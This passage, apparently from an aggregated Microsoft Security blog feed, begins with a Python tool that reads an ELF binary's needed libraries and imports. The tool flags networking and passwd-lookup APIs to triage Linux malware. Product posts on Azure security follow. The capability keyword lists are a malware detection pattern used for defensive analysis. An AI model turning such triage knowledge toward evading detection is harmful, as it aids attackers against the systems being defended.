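# Assumption: capability keyword sets chosen for this example, not an exhaustive taxonomy.
NETWORK_APIS = {"socket", "connect", "bind", "recv", "recvfrom", "getaddrinfo", "inet_pton",
                "inet_ntoa", "setsockopt", "getsockopt", "getsockname", "getpeername", "gethostname"}
PASSWD_APIS = {"getpwnam", "getpwnam_r", "getpwuid_r"}


def _cstr(data: bytes, off: int) -> str:
    """Read a NUL-terminated string from a string table."""
    return data[off:data.index(b"\0", off)].decode("ascii", "replace")


def analyze_elf(data: bytes) -> dict:
    """Return DT_NEEDED libraries, undefined symbols, and a capability summary."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("expected a little-endian ELF64 file")
    hdr = EHDR.unpack_from(data, 0)
    shoff, shentsize, shnum = hdr[6], hdr[11], hdr[12]
    shdrs = [SHDR.unpack_from(data, shoff + i * shentsize) for i in range(shnum)]
    needed, imports = [], []
    for sh in shdrs:
        sh_type, sh_offset, sh_size, sh_link = sh[1], sh[4], sh[5], sh[6]
        strtab = shdrs[sh_link][4] if sh_link < len(shdrs) else 0  # sh_link names the string table
        if sh_type == SHT_DYNAMIC:
            for off in range(sh_offset, sh_offset + sh_size, DYN.size):
                tag, val = DYN.unpack_from(data, off)
                if tag == DT_NULL:
                    break
                if tag == DT_NEEDED:
                    needed.append(_cstr(data, strtab + val))
        elif sh_type == SHT_DYNSYM:
            for off in range(sh_offset, sh_offset + sh_size, SYM.size):
                st_name, _info, _other, st_shndx, _value, _size = SYM.unpack_from(data, off)
                if st_name and st_shndx == SHN_UNDEF:  # resolved by ld.so at run time: a PLT import
                    imports.append(_cstr(data, strtab + st_name))
    return {
        "needed": needed,
        "imports": imports,
        "networking": sorted(s for s in imports if s in NETWORK_APIS),
        "threading": sorted(s for s in imports if s.startswith("pthread_")),
        "passwd": sorted(s for s in imports if s in PASSWD_APIS),
    }


def build_sample_elf() -> bytes:
    """Constructed minimal ELF64 for demonstration (not the tsm64 sample): only .dynstr, .dynamic
    and .dynsym sections, no code. Library names follow the write-up; the imports are a sample."""
    libs = ["libpthread.so.0", "libdl.so.2", "libc.so.6", "ld-linux-x86-64.so.2"]
    syms = ["connect", "pthread_create", "getpwnam", "recv"]
    dynstr, lib_offs, sym_offs = b"\0", [], []
    for name in libs:
        lib_offs.append(len(dynstr))
        dynstr += name.encode() + b"\0"
    for name in syms:
        sym_offs.append(len(dynstr))
        dynstr += name.encode() + b"\0"
    dynamic = b"".join(DYN.pack(DT_NEEDED, o) for o in lib_offs) + DYN.pack(DT_NULL, 0)
    dynsym = SYM.pack(0, 0, 0, 0, 0, 0)  # mandatory null symbol
    dynsym += b"".join(SYM.pack(o, 0x12, 0, SHN_UNDEF, 0, 0) for o in sym_offs)  # GLOBAL FUNC, undefined
    off_dynstr = EHDR.size
    off_dynamic = off_dynstr + len(dynstr)
    off_dynsym = off_dynamic + len(dynamic)
    off_shdrs = off_dynsym + len(dynsym)
    shdrs = [
        SHDR.pack(0, 0, 0, 0, 0, 0, 0, 0, 0, 0),                                       # [0] null
        SHDR.pack(0, SHT_STRTAB, 0, 0, off_dynstr, len(dynstr), 0, 0, 1, 0),            # [1] .dynstr
        SHDR.pack(0, SHT_DYNAMIC, 0, 0, off_dynamic, len(dynamic), 1, 0, 8, DYN.size),  # [2] .dynamic
        SHDR.pack(0, SHT_DYNSYM, 0, 0, off_dynsym, len(dynsym), 1, 1, 8, SYM.size),     # [3] .dynsym
    ]
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\0" * 8  # ELFCLASS64, ELFDATA2LSB, EV_CURRENT
    ehdr = EHDR.pack(ident, 2, 62, 1, 0, 0, off_shdrs, 0, EHDR.size, 0, 0, SHDR.size, len(shdrs), 0)
    return ehdr + dynstr + dynamic + dynsym + b"".join(shdrs)


if __name__ == "__main__":
    for key, value in analyze_elf(build_sample_elf()).items():
        print(f"{key:>11}: {value}")
```

Reading .dynsym rather than disassembling the PLT gives the same list of externally resolved functions without needing a disassembler, and the DT_NEEDED list is exactly what a renamed ld.so such as ‘tsm’ will try to satisfy from the bundled libraries before anything else runs.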

Adversaries are always finding new and novel ways to evade detection. As cyber defenders, we need to keep innovating and tracking the latest threats in order to thwart the new and deceptive attacks making the rounds in the cloud.

Recommended actions

  • Azure Security Center can automatically correlate such multiple triggered alerts into a single security incident. This capability provides a single overview of any attack campaign and all the related alerts to understand the action attackers took and what resources were impacted.
  • While Azure Security Center alerted on the activity, the intrusion could have been prevented through good password hygiene, since the initial access was an SSH brute force. Use passwords and passphrases that are not easily guessed, and reduce the exposure of management ports. Some of our previous blogs cover this topic: Just In Time (JIT) VM access, Password-less sign-in, and Azure Key Vault.
  • Azure Security Center alerts can also be integrated into an existing SIEM solution for a centralized view of the security posture across your organization, or with Azure Sentinel, Microsoft’s new cloud-native SIEM.

Learn more

To learn more about the Azure Security Center, see the following:

The post Uncovering Linux based cyberattack using Azure Security Center appeared first on Microsoft Security.

Ovum recommends Microsoft security to safeguard your hybrid and multi cloud environments

According to a new Ovum report, “[Azure Sentinel]…positions [Microsoft] to be a force for change in a security information and events management (SIEM) market that is ripe for disruption at the moment.” As enterprises migrate to the cloud, they’re increasingly operating on-premises and cloud environments spread across multiple cloud providers. These complex environments and multiple security products can make it challenging for security professionals to make correlations across their entire infrastructure and separate the signal from the noise.

The report, titled Microsoft’s Expanded Horizons in Security, written by Rik Turner and published in April 2019, evaluated Azure Sentinel among other new Microsoft services and determined that hybrid cloud customers who use Azure as one of their cloud providers should consider Microsoft for security across hybrid and multi cloud environments.

Ovum notes that in the last few years Microsoft has introduced new services and capabilities that support operating systems and platforms beyond Windows. The report identified the following reasons that Microsoft security products are appropriate if you need to secure non-Microsoft products as well as Azure:

  • Password-less authentication and conditional access.
  • Microsoft Threat Protection secures identities, endpoints, user data, cloud apps, and infrastructure.
  • Microsoft Information Protection services extend to cloud apps with Microsoft Cloud App Security.
  • Azure Sentinel may disrupt the security management marketplace.

Azure for password-less authentication and conditional access

Active Directory and Azure Active Directory (Azure AD) are market leaders for on-premises and cloud-based directories that many enterprises already use. In addition to provisioning and deprovisioning, security capabilities such as modern authentication and conditional access make Azure AD a compelling choice for identity access management (IAM).

In recent years, Microsoft has introduced many capabilities to support modern authentication. Multi-Factor Authentication (MFA), also called two-factor authentication (2FA), lets you enforce a secondary authentication method so you don’t rely on passwords alone. Azure AD supports password-less authentication such as biometrics and FIDO2-compliant security keys, and the Microsoft Authenticator mobile app, which generates a one-time passcode or a push notification, can serve as the secondary authentication method.

Azure AD conditional access gives administrators additional control over who can access company resources, both on the first access attempt and throughout the user session. Conditional access works by evaluating the circumstances of the authentication request, such as the device used, the location of the request, the user, the network, and the risk level assigned to the user and the sign-in, and then automatically applying pre-defined access policies.

For example, if a user attempts to access sensitive data from an unsecure network, Azure AD can block the request. If a user has been deemed likely compromised, Azure AD can require a password reset before allowing access.

Azure AD security policies aren’t just for Microsoft products. Integration with Microsoft Cloud App Security, a cloud access security broker (CASB), lets you extend authentication policies to all your cloud apps, including non-Microsoft applications.

Microsoft Threat Protection secures identities, endpoints, user data, cloud apps, and infrastructure

Recent acquisitions and the Microsoft Intelligent Security Graph give Microsoft the data and technology to provide protection across identities, endpoints, emails, messages, documents, cloud applications, and infrastructure. The Intelligent Security Graph gathers threat information from Microsoft products deployed around the world, from security partners, and from Microsoft’s own security team. To make sense of trillions of signals, machine learning and artificial intelligence (AI) algorithms analyze the data to find correlations and patterns. The Microsoft Threat Protection suite of products uses analysis from the Intelligent Security Graph to learn what normal user behavior looks like, so that it can detect anomalous behavior and alert on or block it.

Microsoft Information Protection services extend to cloud apps with Microsoft Cloud App Security

Microsoft Information Protection helps secure data at-rest in file repositories, cloud storage services, and on users’ devices. It protects data in motion as it moves or travels to different locations. The service accomplishes this with four steps: detection, classification, protection, and monitoring. Microsoft Information Protection is able to detect sensitive data across on-premises and cloud repositories. Once the data is detected, Microsoft Information Protection classifies and labels it based on a pre-defined taxonomy that identifies how sensitive the data is, such as “Highly Confidential” or “Non Business.” Protection is applied based on the classification and can include actions such as file encryption. You can set policies to prevent copy and save functions, among other protections. Monitoring capabilities allow administrators to track the document as it moves inside and outside of your organization.

Microsoft Cloud App Security integrates with Microsoft Information Protection to extend the discovery, classification, protection, and monitoring capabilities to cloud apps. Administrators can even quarantine a file or limit sharing after it has moved to non-Microsoft cloud services.

Azure Sentinel may disrupt the security management marketplace

Ovum’s report identifies opportunities to offer better products in security management, especially SIEM platforms and products. SIEMs aggregate log files into one repository so security teams can analyze the data and remediate detected threats. As the amount of data has grown, the need to augment SIEMs with more robust analytics capabilities has exploded. SIEM vendors charge a lot for log storage, and customers are overwhelmed by the number of alerts their SIEM platforms generate, many of them false positives.

Azure Sentinel can save time, reduce costs, and reduce alert fatigue by using AI and machine learning models to sift through the noise and more accurately identify real threats. Azure Sentinel currently aggregates data from Office 365 apps and data from security partners. In pilot tests, it reduced alert fatigue by as much as 90 percent.

Microsoft’s other security management offerings can help customers manage security across a diverse cloud ecosystem. Azure Security Center helps customers stay compliant with regulations, identifies security vulnerabilities, and detects and blocks threats. Later this year, these capabilities will be extended to Amazon Web Services (AWS) and eventually Google Cloud Platform (GCP).

Learn more

The report offers several examples of how Microsoft is evolving its security strategy to support the complex environments that enterprises must secure. Ovum expects that Microsoft will continue to expand the number of products that secure multiple platforms as it provides more support for Mac, Linux, AWS, and GCP.

Read the Ovum report to learn more about how Microsoft’s current offering and strategy makes it a good fit for current Azure customers who have a mix of on-premises and clouds and/or use two or more cloud service providers.

The post Ovum recommends Microsoft security to safeguard your hybrid and multi cloud environments appeared first on Microsoft Security.

Identity enhancements to support the more than 1 million active third-party applications on our platform

This week at //build 2019, we’re announcing several enhancements to our identity platform for developers. These enhancements are designed to support the more than one million active third-party applications using our identity platform each month and include:

  • Our work to unify the Microsoft identity platform across personal accounts and Azure Active Directory (Azure AD) accounts.
  • Our new unified app registrations portal.
  • The Microsoft Authentication Libraries.
  • Ability to use your GitHub identity to sign in to Microsoft products.

Head over to the Identity blog for a closer look at these enhancements for developers. If you’re at //build this week, stop by the Microsoft identity platform and Azure AD booths.

The post Identity enhancements to support the more than 1 million active third-party applications on our platform appeared first on Microsoft Security.